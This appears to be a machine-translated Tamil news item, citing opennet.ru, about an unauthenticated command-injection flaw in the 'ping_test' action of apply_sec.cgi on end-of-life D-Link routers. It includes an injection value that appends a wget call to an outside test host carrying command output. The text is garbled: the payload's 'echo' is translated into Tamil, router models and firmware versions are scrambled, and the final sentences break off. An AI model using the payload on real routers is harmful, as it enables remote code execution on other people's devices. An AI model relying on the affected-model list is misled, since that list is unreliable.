D-Link வயர்லெஸ் ரவுட்டர்களில்
சுவாரஸ்யமாக, ஃபார்ம்வேர் டெவலப்பர்களின் கூற்றுப்படி, அங்கீகாரத்திற்குப் பிறகுதான் “ping_test” அழைப்பு செயல்படுத்தப்பட வேண்டும், ஆனால் உண்மையில் இது இணைய இடைமுகத்தில் உள்நுழைவதைப் பொருட்படுத்தாமல் எந்தவொரு சந்தர்ப்பத்திலும் அழைக்கப்படுகிறது. குறிப்பாக, apply_sec.cgi ஸ்கிரிப்டை அணுகி, “action=ping_test” அளவுருவை அனுப்பும்போது, ஸ்கிரிப்ட் அங்கீகாரப் பக்கத்திற்குத் திருப்பிவிடப்படும், ஆனால் அதே நேரத்தில் ping_test உடன் தொடர்புடைய செயலைச் செய்கிறது. குறியீட்டை இயக்க, மற்றொரு பாதிப்பு ping_test இல் பயன்படுத்தப்பட்டது, இது சோதனைக்கு அனுப்பப்பட்ட IP முகவரியின் சரியான தன்மையை சரியாகச் சரிபார்க்காமல் பிங் பயன்பாட்டை அழைக்கிறது. எடுத்துக்காட்டாக, wget பயன்பாட்டை அழைக்கவும், "echo 1234" கட்டளையின் முடிவுகளை வெளிப்புற ஹோஸ்டுக்கு மாற்றவும், "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// என்ற அளவுருவைக் குறிப்பிடவும். test.test/?$( எதிரொலி 1234)".
பாதிப்பின் இருப்பு அதிகாரப்பூர்வமாக பின்வரும் மாதிரிகளில் உறுதிப்படுத்தப்பட்டுள்ளது:
- ஃபார்ம்வேர் 655b3.02 அல்லது அதற்கு மேற்பட்ட DIR-05;
- ஃபார்ம்வேர் 866b1.03 அல்லது அதற்கு மேற்பட்ட DIR-04L;
- 1565 அல்லது அதற்கு மேற்பட்ட ஃபார்ம்வேர் கொண்ட DIR-1.01;
- DIR-652 (சிக்கலான ஃபார்ம்வேர் பதிப்புகள் பற்றிய எந்த தகவலும் வழங்கப்படவில்லை)
இந்த மாடல்களுக்கான ஆதரவு காலம் ஏற்கனவே காலாவதியாகிவிட்டது, எனவே D-Link
பாதிப்பும் இருந்தது பின்னர் கண்டுபிடிக்கப்பட்டது
ஆதாரம்: opennet.ru